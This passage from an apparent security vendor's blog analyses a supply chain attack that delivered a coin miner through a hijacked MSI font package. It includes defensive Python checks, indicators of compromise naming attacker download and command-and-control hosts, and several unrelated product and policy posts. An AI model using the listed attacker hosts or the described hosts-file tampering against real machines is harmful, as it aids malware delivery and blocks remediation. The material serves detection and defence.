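        "downloads": [e["url"] for e in activity_before(events, created["ts"], chain, "network")],
        "dropped_before": [e["path"] for e in activity_before(events, created["ts"], chain, "file")],
    }


if __name__ == "__main__":
    for name in ("xbox-service.exe", "pagefile.sys"):
        print(name, investigate(EVENTS, name))
```

For xbox-service.exe the result names msiexec.exe running as SYSTEM as the creator, PdfEditorSetup.exe as its parent, the same msiexec.exe as the process that registered the service, and the download from the attacker's host as the network activity immediately before the file appeared. The chain stops when a parent is missing from the data, which is the normal case for a process whose parent exited or was not recorded; pid reuse across a long window is the usual trap and is not handled here.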

The malicious MSI file was installed silently as part of a set of font packages; it was mixed in with other legitimate MSI files downloaded by the app during installation. All the MSI files were clean and digitally signed by the same legitimate company except for the one malicious file. Clearly, something in the download and installation chain was subverted at the source, an indication of a software supply chain attack.

Figure 2. Windows Defender ATP answers who, when, what (xbox-service.exe created right after MSI installation)

As observed in previous supply chain incidents, hiding malicious code inside an installer or updater program gives attackers the immediate benefit of having full elevated privileges (SYSTEM) on a machine. This gives malicious code the permissions to make system changes like copying files to the system folder, adding a service, and running coin mining code.

Confident with the results of our investigation, we reported findings to the vendor distributing the PDF editor app. They were unaware of the issue and immediately started investigating on their end.

Working with the app vendor, we discovered that the vendor itself was not compromised. Instead, the app vendor was the victim of a supply chain attack traceable to its dependency on a second software vendor, which was responsible for creating and distributing the additional font packages used by the app. The app vendor promptly notified their partner vendor, who was able to identify and remediate the issue and quickly interrupted the attack.

Multi-tier software supply chain attack

The goal of the attackers was to install a cryptocurrency miner on victim machines. They used the PDF editor app to download and deliver the malicious payload. To compromise the software distribution chain, however, they targeted one of the app vendor's software partners, which provided and hosted additional font packages downloaded during the app's installation.

Figure 3. Diagram of the software distribution infrastructure of the two vendors involved in this software supply chain attack

This software supply chain attack shows how cybercriminals are increasingly using methods typically associated with sophisticated cyberattacks. The attack required a certain level of reconnaissance: the attackers had to understand how the normal installation worked. They eventually found an unspecified weakness in the interactions between the app vendor and partner vendor that created an opportunity.

The attackers figured out a way to hijack the installation chain of the MSI font packages by exploiting the weakness they found in the infrastructure. Thus, even if the app vendor was not compromised and was completely unaware of the situation, the app became the unexpected carrier of the malicious payload because the attackers were able to redirect downloads.

At a high level, here's an explanation of the multi-tier attack:

  1. The attackers recreated the software partner's infrastructure on a replica server that they owned and controlled. They copied and hosted all the MSI files, including the font packages, all clean and digitally signed, on the replica server.
  2. The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code. Once tampered with, this package no longer carried a valid signature and could no longer be trusted.
  3. Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the app. The parameters included a new download link that pointed to the attacker server.
  4. As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and resolving to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers' replica server instead of the software partner's server.

While the attack was active, when the app reached out to the software partner's server during installation, it was redirected to download the malicious MSI font package from the attackers' replica server. Thus, users who downloaded and installed the app also installed the coin miner malware. Afterwards, when the device restarts, the malicious MSI file is replaced with the original legitimate one, so victims may not immediately realize that a compromise happened. Additionally, the update process was not compromised, so the app could properly update itself.

Windows Defender ATP customers were immediately alerted of the suspicious installation activity carried out by the malicious MSI installer and by the coin miner binary, and the threat was automatically remediated.

Figure 4. Windows Defender ATP alert process tree for download and installation of MSI font packages: all legitimate, except for one

Since the compromise involved a second-tier software partner vendor, the attack could potentially expand to customers of other app vendors that share the same software partner. Based on PDF application names hardcoded by the attackers in the poisoned MSI file, we have identified at least six additional app vendors that may be at risk of being redirected to download installation packages from the attackers' server. While we were not able to find evidence that these other vendors distributed the malicious MSI, the attackers were clearly operating with a broader distribution plot in mind.

Another coin miner malware campaign

The poisoned MSI file contained malicious code in a single DLL file that added a service designed to run a coin mining process. The malware, detected as Trojan:Win64/CoinMiner, hid behind the name xbox-service.exe. When run, it consumed affected machines' computing resources to mine Monero coins.

Figure 5. Malicious DLL payload extracted from the MSI installer

Another interesting aspect of the DLL payload is that, during the malware installation stage, it tries to modify the Windows hosts file so that the infected machine can't communicate with the update servers of certain PDF apps and security software. This is an attempt to prevent remote cleaning and remediation of affected machines.

Figure 6. Preventing further download of updates from certain PDF app vendors
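
The hosts-file tampering described above is cheap to check for: any entry that maps an update or licensing hostname you depend on to a loopback or unspecified address is a sinkhole, and one that maps it to some other address is a redirect. The following is an added example of such a check, not the malware's code and not Microsoft's detection logic. The watchlist hostnames and the sample hosts content are constructed; in practice the watchlist would hold the update and licensing hostnames of the PDF apps and security products deployed in your environment.

```python
"""Flag hosts-file entries that black-hole or redirect watched domains.

Added example: not the malware's code and not Microsoft's detection logic.
The watchlist and the sample hosts content are constructed.
"""
import ipaddress
from ipaddress import IPv4Address, IPv6Address
from typing import List, Set, Tuple, Union

# Assumed watchlist (constructed names): update/licensing hosts worth protecting.
WATCHLIST: Set[str] = {
    "update.example-pdf.test", "licensing.example-pdf.test", "update.example-av.test",
}
# Addresses that make a name unreachable rather than pointing it elsewhere.
SINKHOLE_IPS = {ipaddress.ip_address(a) for a in ("127.0.0.1", "0.0.0.0", "::1", "::")}

SAMPLE_HOSTS = """# constructed sample, not a real capture
127.0.0.1       localhost
::1             localhost
# 102.54.94.97  rhino.acme.com        # commented-out entries must be ignored
127.0.0.1   update.example-pdf.test   # appended by the installer
0.0.0.0 licensing.example-pdf.test www.example-pdf.test update.example-av.test
192.0.2.10  intranet.corp.test
"""

Address = Union[IPv4Address, IPv6Address]


def parse_hosts(text: str) -> List[Tuple[Address, List[str]]]:
    """(address, [names]) per entry; comments, blanks and unparsable lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue    # malformed address; the resolver would not honour it either
        entries.append((addr, [n.lower().rstrip(".") for n in fields[1:]]))
    return entries


def _watched(name: str, watchlist: Set[str]) -> bool:
    """True for a watched name or any subdomain of it."""
    return any(name == w or name.endswith("." + w) for w in watchlist)


def suspicious_entries(text: str, watchlist: Set[str] = WATCHLIST) -> List[Tuple[str, str, str]]:
    """(name, address, reason) for every watched name the file overrides."""
    hits = []
    for addr, names in parse_hosts(text):
        for name in names:
            if _watched(name, watchlist):
                reason = "sinkholed" if addr in SINKHOLE_IPS else "redirected"
                hits.append((name, str(addr), reason))
    return hits


def scan_file(path: str, watchlist: Set[str] = WATCHLIST) -> List[Tuple[str, str, str]]:
    """Scan the file on disk, e.g. C:\\Windows\\System32\\drivers\\etc\\hosts."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read(), watchlist)


if __name__ == "__main__":
    for hit in suspicious_entries(SAMPLE_HOSTS):
        print("%-30s -> %-12s %s" % hit)
```

Run against the sample, the three watched names are reported as sinkholed and the unrelated www entry is ignored. A redirect to a routable address is reported separately because it is the more dangerous case: an update channel pointed at an attacker-controlled host rather than simply cut off.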

Inside the DLL, we also found some traces of an alternative form of coin mining: browser scripts. It's unclear if this code was the attackers' potential secondary plan or simply a work in progress to add one more way to maximize coin mining opportunities. The DLL contained strings and code that may be used to launch a browser to connect to the popular Coinhive library to mine Monero coins.

Figure 7. Browser-based coin mining script

Software supply chain attacks: A growing industry problem

In early 2017, we discovered operation WilySupply, an attack that compromised a text editor's software updater to install a backdoor on targeted organizations in the financial and IT sectors. Several weeks later, another supply chain attack made headlines by initiating a global ransomware outbreak. We confirmed speculations that the update process for a tax accounting software popular in Ukraine was the initial infection vector for the Petya ransomware. Later that same year, a backdoored version of CCleaner, a popular freeware tool, was delivered from a compromised infrastructure. Then, in early 2018, we uncovered and stopped a Dofoil outbreak that poisoned a popular signed peer-to-peer application to distribute a coin miner.

These are just some of many similar cases of supply chain attacks observed in 2017 and 2018. We predict, as many other security researchers do, that this worrisome upward trend will continue.

Figure 8. Software supply chain attacks trends (source: RSA Conference 2018 presentation “The Unexpected Attack Vector: Software Updaters“)

The growing prevalence of supply chain attacks may be partly attributed to hardened modern platforms like Windows 10 and the disappearance of traditional infection vectors like browser exploits. Attackers are constantly looking for the weakest link; with zero-day exploits becoming too expensive to buy or create (exploit kits are at their historically lowest point), attackers search for cheaper entry points like software supply chain compromise, taking advantage of unsafe coding practices, insecure protocols, or unprotected server infrastructure at software vendors.

The benefit for attackers is clear: supply chains can offer a big base of potential victims and can result in big returns. Such attacks have been observed targeting a wide range of software and impacting organizations in different sectors. It's an industry-wide problem that requires attention from multiple stakeholders: software developers and vendors who write the code, system admins who manage software installations, and the information security community who find these attacks and create solutions to protect against them, among others.

For further reading, including a list of notable supply chain attacks, check out our RSA Conference 2018 presentation on the topic of software supply chain attack trends: The Unexpected Attack Vector: Software Updaters.

Recommendations for software vendors and developers

Software vendors and developers need to ensure they produce secure as well as useful software and services. To do that, we recommend:

  • Maintain a highly secure build and update infrastructure.

    • Immediately apply security patches for OS and software.
    • Implement mandatory integrity controls to ensure only trusted tools run.
    • Require multi-factor authentication for admins.

  • Build secure software updaters as part of the software development lifecycle.

    • Require SSL for update channels and implement certificate pinning.
    • Sign everything, including configuration files, scripts, XML files, and packages.
    • Check for digital signatures, and don't let the software updater accept generic input and commands.

  • Develop an incident response process for supply chain attacks.

    • Disclose supply chain incidents and notify customers with accurate and timely information.
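
The attack walk-through earlier in this post (replica server, one repackaged MSI, redirected download parameters) and the updater recommendations above describe the same control from two sides. An installer that pins where it is allowed to download from, treats its download parameters as data rather than commands, and verifies every package against a manifest it already trusts would have refused the hijacked font package at two independent points: the attacker host would fail the allowlist, and the repackaged MSI would fail verification even if it had been served from the legitimate host. The following is an added example of those checks, not the PDF app vendor's installer and not Microsoft code. Hostnames, package bytes and the manifest are constructed; the attacker host is the one from the IOC section. It simplifies one thing: the manifest is authenticated by a SHA-256 pin compiled into the installer, where a real updater would verify a publisher signature on the manifest (and, on Windows, the Authenticode signature on each MSI) instead.

```python
"""Installer-side checks that refuse a hijacked package download.

Added example: not the PDF app vendor's installer and not Microsoft code.
Hostnames, package bytes and the manifest are constructed; the attacker
host is the one in the post's IOC section. The manifest pin stands in for
a publisher-signature check.
"""
import hashlib
import hmac
import json
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

ALLOWED_HOSTS = {"fonts.example-partner.test"}       # assumed partner host, compiled in
PACKAGE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.msi$")   # no path separators or schemes
EXPECTED_PARAM_KEYS = {"base_url", "packages"}        # the only input the updater takes


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for package bytes.
CLEAN_LATIN = b"MSI:latin-fonts:signed-by-partner"
CLEAN_ASIAN = b"MSI:asian-fonts:signed-by-partner"
TAMPERED_ASIAN = CLEAN_ASIAN + b"+coinminer-service.dll"   # repackaged, signature gone

MANIFEST_JSON = json.dumps({"latin.msi": sha256(CLEAN_LATIN),
                            "asian.msi": sha256(CLEAN_ASIAN)}, sort_keys=True).encode()
MANIFEST_PIN = sha256(MANIFEST_JSON)   # shipped inside the installer, never downloaded


def load_manifest(raw: bytes, pin: str) -> Dict[str, str]:
    """Accept the manifest only if it matches the pin the installer ships with."""
    if not hmac.compare_digest(sha256(raw), pin):
        raise ValueError("manifest integrity check failed")
    return json.loads(raw)


def check_download_url(url: str) -> str:
    """Return "" if the URL may be fetched, otherwise why it is refused."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return "scheme is not https"
    if parts.username or parts.password:
        return "userinfo in URL"
    if parts.hostname not in ALLOWED_HOSTS:
        return "host %r not in allowlist" % parts.hostname
    return ""


def install_packages(params: Dict, fetch: Callable[[str], bytes],
                     manifest: Dict[str, str]) -> List[Tuple[str, str]]:
    """Per-package verdict; 'ok' means the bytes may be handed to the installer."""
    unexpected = set(params) - EXPECTED_PARAM_KEYS
    if unexpected:   # parameters are data, never free-form commands
        return [("*", "unexpected parameters: %s" % sorted(unexpected))]
    verdicts = []
    for name in params["packages"]:
        if not PACKAGE_NAME.match(name):
            verdicts.append((name, "bad package name"))
        elif name not in manifest:
            verdicts.append((name, "not in manifest"))
        else:
            url = urljoin(params["base_url"], name)   # base_url must end with "/"
            why = check_download_url(url)
            if why:
                verdicts.append((name, "refused: " + why))
            elif not hmac.compare_digest(sha256(fetch(url)), manifest[name]):
                verdicts.append((name, "hash mismatch, not installed"))
            else:
                verdicts.append((name, "ok"))
    return verdicts


# Offline stand-in for HTTP: what each server would return (constructed).
PARTNER = "https://fonts.example-partner.test/packages/"
ATTACKER = "http://vps11240.hyperhost.name/escape/"   # host from the IOC list
SERVED = {PARTNER + "latin.msi": CLEAN_LATIN, PARTNER + "asian.msi": CLEAN_ASIAN,
          ATTACKER + "latin.msi": CLEAN_LATIN, ATTACKER + "asian.msi": TAMPERED_ASIAN}


def offline_fetch(url: str) -> bytes:
    return SERVED[url]


def compromised_partner_fetch(url: str) -> bytes:
    """The partner host itself serving the repackaged MSI."""
    return TAMPERED_ASIAN if url.endswith("asian.msi") else SERVED[url]


GOOD_PARAMS = {"base_url": PARTNER, "packages": ["latin.msi", "asian.msi"]}
HIJACKED_PARAMS = {"base_url": ATTACKER, "packages": ["latin.msi", "asian.msi"]}

if __name__ == "__main__":
    manifest = load_manifest(MANIFEST_JSON, MANIFEST_PIN)
    print("normal   ", install_packages(GOOD_PARAMS, offline_fetch, manifest))
    print("hijacked ", install_packages(HIJACKED_PARAMS, offline_fetch, manifest))
    print("partner  ", install_packages(GOOD_PARAMS, compromised_partner_fetch, manifest))
```

The fetch callable is injected so the decision logic can be exercised offline; in the real installer it would be the TLS client, with certificate pinning applied there. Note the order of checks: the URL is refused before any bytes are fetched, so a redirected base_url never reaches the network, and the hash comparison uses a constant-time compare even though the values here are public, which keeps the habit consistent with any secret-bearing comparison elsewhere in the updater.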

Defending corporate networks against supply chain attacks

Software supply chain attacks raise new challenges in security given that they take advantage of common everyday tasks like software installation and update. Given the increasing prevalence of these types of attacks, organizations should investigate the following security solutions:

  • Adopt a walled garden ecosystem for devices, especially for critical systems. Windows 10 in S mode is designed to allow only apps installed from the Microsoft Store, ensuring Microsoft-verified security.
  • Deploy strong code integrity policies. Application control can be used to restrict the applications that users are allowed to run. It also restricts the code that runs in the system core (kernel) and can block unsigned scripts and other forms of untrusted code for customers who can't fully adopt Windows 10 in S mode.
  • Use endpoint detection and response (EDR) solutions. Endpoint detection and response capabilities in Windows Defender ATP can automatically detect and remediate suspicious activities and other post-breach actions, so even when the entry vector is as stealthy as a software supply chain compromise, Windows Defender ATP can help detect and contain such incidents sooner.

In supply chain attacks, the actual compromise happens outside the network, but organizations can detect and block malware that arrive through this method. The built-in security technologies in Windows Defender Advanced Threat Protection (Windows Defender ATP) work together to create a unified endpoint security platform. For example, as demonstrated in this investigation, antivirus capabilities detected the coin mining payload. The detection was surfaced on Windows Defender ATP, where automated investigation resolved the attack, protecting customers. The rich alert timeline and advanced hunting capabilities in Windows Defender ATP showed the extent of the software supply chain attack. Through this unified platform, Windows Defender ATP delivers attack surface reduction, next-generation protection, endpoint detection and response, automated investigation and response, and advanced hunting.

 

 

Elia Florio
with Lior Ben Porat
Windows Defender ATP Research team

Indicators of compromise (IOCs)

Malicious MSI font packages:
– a69a40e9f57f029c056d817fe5ce2b3a1099235ecbb0bcc33207c9cff5e8ffd0
– ace295558f5b7f48f40e3f21a97186eb6bea39669abcfa72d617aa355fa5941c
– 23c5e9fd621c7999727ce09fd152a2773bc350848aedba9c930f4ae2342e7d09
– 69570c69086e335f4b4b013216aab7729a9bad42a6ce3baecf2a872d18d23038

Malicious DLLs embedded in MSI font packages:
– b306264d6fc9ee22f3027fa287b5186cf34e7fb590d678ee05d1d0cff337ccbf

Coin miner malware:
– fcf64fc09fae0b0e1c01945176fce222be216844ede0e477b4053c9456ff023e (xbox-service.exe)
– 1d596d441e5046c87f2797e47aaa1b6e1ac0eabb63e119f7ffb32695c20c952b (pagefile.sys)

Software supply chain download server:
– hxxp://vps11240[.]hyperhost[.]name/escape/[some_font_package].msi (IP: 91[.]235[.]129[.]133)

Command-and-control/coin mining:
– hxxp://data28[.]somee[.]com/data32[.]zip
– hxxp://carma666[.]byethost12[.]com/32[.]html

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Be like a Moomin: How to establish trust between competitors so we can fight cybercrime

July 24th, 2018

Image of a Moomin keychain sitting on a hotel desk.

Do you know the Moomins? They’re a tight-knit, happy, collaborative cartoon family. I’d never heard of them until I was lucky enough to spend a few days at the Microsoft offices in Helsinki, Finland.

The Moomin keychain in the photo was a gift from the Finnish CISO. As I did a little research into Moomin lore, I discovered a family of wonderful trolls who work with each other, their friends, and acquaintances to overcome adversity. In the first book, The Moomins and the Great Flood, the Moomins become separated. With the landscape flooded, they are unable to find their village, Moominpappa, until they befriend a stork who offers to help them with a winged ride, giving them an aerial vantage point.

The collaborative problem-solving approach of the Moomins fits right into the overall story of trust I frequently heard during my Finland trip. The country has one of the most trusted police and governments in the world. This may partly be due to the fact that trust in the government has been historically high in Nordic countries. In 2015, Finland was the second least corrupt country according to the Transparency International organization.

In the online world, Finland has one of the fastest internet speeds in the world, running on some of the least malware-infected pipes. How are they doing this? With tools such as the CERT-FI Autoreporter system, which helps admins find and respond to breaches faster and empowers admins to take action to protect their networks. This level of engaged partnership in the overall health of the country’s network is valued. The cybersecurity professionals I spoke with are very focused on maintaining this trust and continue to identify and build opportunities for collaboration between the public and private sectors.

There's some great learning in there for the international cybersecurity community. It's no secret that cyber-adversaries are selectively collaborating to help make themselves more effective. Operating in dark web exchanges and via encrypted messenger, they share exploits, malcode, and successful attack techniques. But if, as the saying goes, there's no honor amongst thieves, how has an international collective of attackers figured out a model for collaboration that in some ways rivals the trust and collaboration between organizations and countries?

Arguably, their collaboration use case is substantively different from large multinational corporations and governments. The value of an exploit generally degrades the longer it is in the wild. This means that part of the cybercriminal financial model is highly dependent on the speed of dissemination. If they hold onto an exploit for too long, they risk having a valueless asset. Finding and monetizing a SQL injection vulnerability is a fairly straightforward and rapid activity. This is in high contrast to large organizations doing business around the globe that must spend a significant amount of time planning and executing their business strategies. Not to mention the fact that, by definition, criminals don't operate under any governmental laws, have any employee protection rules, or pay employee taxes.

On the legal side of cybersecurity, we need to plan for long-term success and adhere to a long list of mandates and regulations. And because we're not in the business of selling exploits, sharing with others how one company defends against them could be seen as giving away part of a competitive edge. When it comes to governments, the hurdles to collaborative trust can be much higher, especially when some of those governments are in virtual trade wars with each other.

Despite the hurdles, we can move forward with cyber-collaboration, without losing our collective competitive edge, by following these three steps:

  1. Agree on the rules: Who shares what and when? And what's the quid pro quo? Asymmetric sharing becomes lopsided and abandoned. Also, how will the information be protected and, as needed, anonymized?
  2. Leverage what's there: ISACs are already up and running, with their own rules. There are also industry consortiums like Cloud Security Alliance (CSA) and vendor associations like the Microsoft Intelligent Security Association.
  3. Enforce the rules: If members of an association don't play fair, it won't be long before members who are following the rules feel cheated. Voluntary trust is good, but there needs to be an enforcement mechanism to ensure fairness. Organizations that don't follow the rules risk getting cut out.

Much like the stork in the story helped the Moomins get an aerial vantage point of the landscape to help find their way to Moominpappa, so too can a collaborative and open sharing approach, subject to the rules, processes, and parameters defined in the steps above, give you a different perspective of the landscape that your business needs to traverse from a security standpoint.

But keep in mind that, in the story, the stork doesn't do all the work; there's action required on the part of the Moomins too. They need to find the stork in the first place. In our world, this means a systematic effort to reach out to and engage with information-sharing partners and active cultivation of these relationships. Likewise, knowing how to employ that information is also critical. To this end, threat intelligence tools that enhance visibility and detective controls, such as SIM and IDS, help you understand the current state of your environment to better utilize information you receive from information-sharing partners.

Lastly, the Moomins need to know about their village (Moominpappa) to be able to recognize it from a distance. Even if the stork provides them with a better view, they still need to recognize the village from the air, which anybody who's been in an airplane can attest isn't always easy. By analogy, this means that the better security teams understand the normative state of their own networks and infrastructure, the better equipped they are to leverage data they learn through sharing and gathered from visibility-enhancing tools.

We're not living in a cartoon world of Moomins, but that doesn't mean we can't take a valuable lesson from them about trust and collaboration.


March-April 2018 test results: More insights into industry AV tests

In a previous post, in the spirit of our commitment to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions, we shared insights and context into the results of AV-TEST's January-February 2018 test cycle. We released a transparency report to help our customers and the broader security community stay informed and understand independent test results better.

In the continued spirit of these principles, we'd like to share Windows Defender AV's scores in the March-April 2018 test. In this new iteration of the transparency report, we continue to investigate the relationship between independent test results and the real-world protection of antivirus solutions. We hope that you find the report insightful.

Download the complete transparency report on March-April 2018 AV-TEST results

 

Below is a summary of the transparency report:

Protection: Windows Defender AV achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680 malware samples (0.035% miss rate). With the latest results, Windows Defender AV has achieved 100% on 9 of the 12 most recent tests (combined “Real World” and “Prevalent malware”).
Usability (false positives): Windows Defender AV maintained its previous score of 5.5/6.0. Based on telemetry, most samples that Windows Defender AV incorrectly classified as malware (false positives) had very low prevalence and are not commonly used in a business context. This means that it is unlikely for these false positives to affect enterprise customers.
Performance: Windows Defender AV maintained its previous score of 5.5/6.0 and continued to outperform the industry in most areas. These results reflect the investments we made in optimizing Windows Defender AV performance for high-frequency actions.

 

The report aims to help customers evaluate the extent to which test results are reflective of the quality of protection in the real world. At the same time, insights from the report continue to drive further improvements in the intelligent security services that Microsoft provides for customers.

Windows Defender AV and the rest of the built-in security technologies in Windows Defender Advanced Threat Protection (Windows Defender ATP) work together to create a unified endpoint security platform. In real customer environments, this unified security platform provides intelligent protection, detection, investigation, and response capabilities that are not currently reflected in independent tests. We tested the two malware samples that Windows Defender AV missed in the March-April 2018 test and proved that for both missed samples, at least three other components of Windows Defender ATP would detect or block the malware in a true attack scenario. You can find these details and more in the transparency report.

Download the complete transparency report on March-April 2018 AV-TEST results

 

The Windows Defender ATP security platform incorporates attack surface reduction, next-generation protection, endpoint detection and response, and advanced hunting capabilities. To see these capabilities for yourself, sign up for a 90-day trial of Windows Defender ATP, or enable Preview features on existing tenants.

Zaid Arafeh

Senior Program Manager, Windows Defender Research team



Jumpstart your Microsoft Graph Security API integration with the new JavaScript sample app

July 18th, 2018

The Microsoft Graph Security API, which launched this spring, is a unified REST API for integrating data and intelligence from Microsoft products, services, and partners. Using Microsoft Graph, developers can easily build applications that consolidate and correlate security alerts from multiple sources, unlock contextual data to inform investigations, and automate security operations for greater efficiency.

We just launched a new sample app that makes it easier than ever for developers to get started. Similar to the Python and C# samples already available, the new JavaScript sample app provides ready-to-run code to:

  • Display a list of all security alerts for a tenant. Filter by top alerts, category, provider, and severity, or alerts related to a particular user or device.
  • View rich alert details in JSON.
  • Show additional information from Microsoft Graph about a user or device.
  • Update the status of an alert, provide feedback, and add comments.
  • Subscribe to notifications of all new and updated alerts that meet your filters.

Get started with the JavaScript sample app today!


Enable your users to work securely from anywhere, anytime, across all of their devices

July 18th, 2018

Image of four hands collaborating over a drawing of a lightbulb.

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 Security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Assessing Microsoft 365 Security solutions using the NIST Cybersecurity Framework.

Your users expect technology to help them be productive, yet you need to keep your organization's data safe. This blog will show you how Microsoft 365 Security solutions can help you achieve this fine balance between productivity and security. We recommend an integrated solution that incorporates managing identities, managing devices, then securing applications, email, and data.

First, we'll start with the question that we often hear from customers: How can I make sure my employees are working securely when they are working remotely? With digital technology changing how people work, users need to be productive on a variety of devices, regardless of whether they are company-provided or bring your own device (BYOD). The vital foundation of your in-depth security strategy is strong, integrated identity protection.

Securing identities to protect at the front door

Identity management in Azure Active Directory (Azure AD) is your first step. Once user identities are managed in Azure AD, you can enable Azure AD single sign-on (SSO) to manage authentication across devices, cloud apps, and on-premises apps. Then layer Multi-factor Authentication (MFA) with Azure AD Conditional Access (see Figure 1). These security tools work together to reauthenticate high-risk users and to take automated action to secure your network.

Infographic of conditions and controls that create a secure network.

Figure 1. Set user policies using Azure AD Conditional Access.

Security across devices

From identity, we move to devices. Microsoft Intune lets you manage both company-owned and BYOD from the cloud. Once you set up your Intune subscription, you can add users and groups, assign licenses, deploy and protect apps, and set up device enrollment.

Through Azure AD, you can then create conditional access policies according to user, device, application, and risk.

To strengthen employee sign-in on Windows 10 PCs, Windows Hello for Business replaces passwords with strong MFA consisting of a user credential and biometric or PIN.

Security across apps

Microsoft Cloud App Security gives you visibility and control over the cloud apps that your employees are using. You can see the overall picture of cloud apps across your network, including any unsanctioned apps your employees may be using. Discovering shadow IT apps can help you prevent unmonitored avenues into or out of your network.

Security across email

Once you have secured your organization's devices and applications, it's equally important to safeguard your organization's flow of information. Sending and receiving email is one of the weakest spots for IT security. Azure Information Protection allows you to configure policies to classify, label, and protect data based on sensitivity. Then you can track activities on shared data and revoke user access if necessary.

For security against malicious emails, Office 365 Advanced Threat Protection (ATP) lets you set up anti-phishing protections to protect your employees from increasingly sophisticated phishing attacks.

Security across data

Once you have secured how employees access data, it's equally important to safeguard the data itself. Microsoft BitLocker Drive Encryption technology prevents others from accessing your disk drives and flash drives without authorization, even if they're lost or stolen. Windows Information Protection helps protect against accidental data leaks, with protection and policies that travel with the data wherever it goes.

Deployment tips from our experts

Now that you know more about how Microsoft 365 security solutions can protect your people and data in a mobile world, here are three proven tips to put it all into action:

  1. Be proactive, not reactive. Proactively provision identities through Azure AD, enroll devices through Microsoft Intune, and set up Intune App Protection. Enrolling devices can help keep your company's data safe by preventing threats or data breaches before they happen.
  2. Keep your company data safe. Managing employee identities is a fundamental part of information security. Enable SSO and MFA, set up conditional access policies, and then deploy Azure Information Protection for classification and protection of sensitive data.
  3. Plan for success with Microsoft FastTrack. This valuable service comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Work securely from anywhere, anytime, across all your devices coming soon!



Microsoft Intelligent Security Association expands with new members and products

Last April, we introduced the Microsoft Intelligent Security Association, a group of 19 security technology providers who have integrated their solutions with a select set of Microsoft products to provide customers better protection, detection, and response.

Today, we are pleased to announce that five new members have agreed to join the association: Duo Security, Fortinet, Trusona, Yubico, and Contrast Security. Microsoft is committed to growing the association with partners who can help increase digital safety for our mutual customers.

In addition to these new members, we are also announcing the addition of Microsoft Cloud App Security, expanding the products included in the program. Cloud App Security gives you visibility into your cloud apps and services, provides sophisticated analytics to identify and combat cyberthreats, and enables you to control how your data travels. We are thrilled that existing members Zscaler and Forcepoint have integrated with our Cloud App Security product to increase the capabilities in new and exciting ways.

Microsoft is excited by the initial reaction to the Microsoft Intelligent Security Association, and we are committed to continuing to build on this early momentum.


How Microsoft 365 Security integrates with the broader security ecosystem—part 1

July 17th, 2018 No comments

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Diana Kelley, Cybersecurity Field CTO.

This week is the annual Microsoft Inspire conference, where Microsoft directly engages with industry partners. Last year at Inspire, we announced Microsoft 365, providing a solution that enables our partners to help customers drive digital transformation. One of the most important capabilities of Microsoft 365 is securing the modern workplace from the constantly evolving cyberthreat landscape. Microsoft 365 includes information protection, threat protection, identity and access management, and security management, providing in-depth and holistic security.

Across our Azure, Office 365, and Windows platforms, Microsoft offers a rich set of security tools for the modern workplace. However, the growth and diversity of technological platforms means customers will leverage solutions extending beyond the Microsoft ecosystem of services. While Microsoft 365 Security offers complete coverage for all Microsoft solutions, our customers have asked:

  1. What is Microsoft's strategy for integrating into the broader security community?
  2. What services does Microsoft offer to help protect assets extending beyond the Microsoft ecosystem?
  3. Are there real-world examples of Microsoft providing enterprise security for workloads outside of the Microsoft ecosystem and is the integration seamless?

In this series of blogs, we'll address these topics, beginning with Microsoft's strategy for integrating into the broader security ecosystem. Our integration strategy begins with global partnerships with industry peers, industry alliances, law enforcement, and governments.

Industry peers

Cyberattacks on businesses and governments continue to escalate, and our customers must respond more quickly and aggressively to help ensure the safety of their data. For many organizations, this means deploying multiple security solutions, which are more effective when they share information seamlessly and work jointly as a cohesive solution. To this end, we established the Microsoft Intelligent Security Association. Members of the association work with Microsoft to help ensure solutions have access to more security signals from more sources, enhanced by shared threat intelligence, helping customers detect and respond to threats faster.

Figure 1 shows current members of the Microsoft Intelligent Security Association whose solutions complement Microsoft 365 Security, strengthening the services offered to customers:

Figure 1. Microsoft Intelligent Security Association member organizations.

Industry alliances

Industry alliances are critical for developing guidelines and best practices and for standardizing security requirements. For example, the Fast Identity Online (FIDO) Alliance helps ensure organizations can provide secure authentication and mobile user credentials, both on-premises and in web properties. Microsoft is a FIDO board member. Securing identities is a critical part of today's security. FIDO intends to help ensure all who use day-to-day web or on-premises services are provided a standard and exceptional experience for securing their identity.

Microsoft exemplifies a great sign-in experience with Windows Hello, leveraging facial recognition, PIN codes, and fingerprint technologies to power secure authentication for every service and application. FIDO believes the experience is more important than the technology, and Windows Hello is a great experience for everyone as it maintains a secure user sign-in. FIDO is just one example of how Microsoft is taking a leadership position in the security community.

Figure 2 shows FIDO's board member organizations:

Figure 2. FIDO Alliance Board member organizations.

Law enforcement and governments

To help support law enforcement and governments, Microsoft has developed the Digital Crimes Unit (DCU), focused on:

  • Tech support fraud
  • Online child exploitation
  • Cloud crime and malware
  • Global strategic enforcement
  • Nation-state actors

The DCU is an international team of attorneys, investigators, data scientists, engineers, analysts, and business professionals working together to transform the fight against cybercrime. Part of the DCU is the Cyber Defense Operations Center, where Microsoft monitors the global threat landscape, staying vigilant to the latest threats.

Figure 3 shows the DCU's Cyber Defense Operations Center:

